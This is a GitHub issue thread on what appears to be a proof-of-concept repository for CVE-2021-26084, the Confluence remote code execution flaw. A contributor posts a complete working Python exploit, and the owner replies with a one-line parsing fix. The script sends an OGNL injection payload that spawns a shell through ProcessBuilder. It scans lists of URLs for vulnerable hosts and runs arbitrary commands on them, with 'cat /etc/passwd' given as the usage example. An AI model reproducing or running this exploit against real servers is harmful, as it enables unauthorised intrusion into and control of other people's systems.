Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

附上可用的code,解决标签定位的小问题,非常感谢作者提供的代码! #2

Closed
Kar1chan opened this issue Sep 2, 2021 · 2 comments
Closed

附上可用的code,解决标签定位的小问题,非常感谢作者提供的代码! #2

Kar1chan opened this issue Sep 2, 2021 · 2 comments

Comments

@Kar1chan
Copy link

Kar1chan commented Sep 2, 2021
edited

第56行修改method="POST" 为method="post"

附上可用的code:

#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File    :   PoC.py
@Time    :   2021/09/01 14:16:26
@Author  :   _0xf4n9x_
@Version :   1.0
@Contact :   fanq.xu@gmail.com
"""


import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()


def usage():
    print("Eg: \n    python3 PoC.py -u http://127.0.0.1")
    print("    python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
    print("    python3 PoC.py -f urls.txt")


def poc(host):
    url = host + "/pages/doenterpagevariables.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}
    params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
    try:
        res = requests.post(url, headers=headers, data=params,
                            timeout=10, verify=False)
        if 'netmask' and 'inet' and 'netmask' in res.text:
            print("[+] " + host + " is vulnerable!")
            return 1
        else:
            print("[-] " + host + " is not vulnerable!")
    except:
        pass


def exp(host, command):
    url = host + "/pages/doenterpagevariables.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}
    params = {
        "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

    res = requests.post(url, headers=headers, data=params,
                        timeout=10, verify=False).text
    print(res)
    soup = BeautifulSoup(res, "html5lib")
    content = soup.find(method="post").find_all('input')[1]["value"]

    print(content.replace('aaaaaaaa[', '').replace('\n]', ''))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-e', '--exec', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    hosts = []
                    hosts = target.read().splitlines()
                    for host in hosts:
                        if poc(host) == 1:
                            with open("success.txt", "a+") as f:
                                f.write(host + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
            if poc(args.url) == 1:
                exp(args.url, args.exec)
    else:
        parser.print_help()
        usage()
@0xf4n9x
Copy link
Owner

0xf4n9x commented Sep 2, 2021

Update the code for tag positioning, credits CVE-2021-26084_Confluence.

    content = soup.find('input', attrs={'name': 'queryString', 'type': 'hidden'})['value']

@0xf4n9x 0xf4n9x closed this as completed Sep 2, 2021
@0xf4n9x
Copy link
Owner

0xf4n9x commented Sep 2, 2021

Thank you very much!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@0xf4n9x @Kar1chan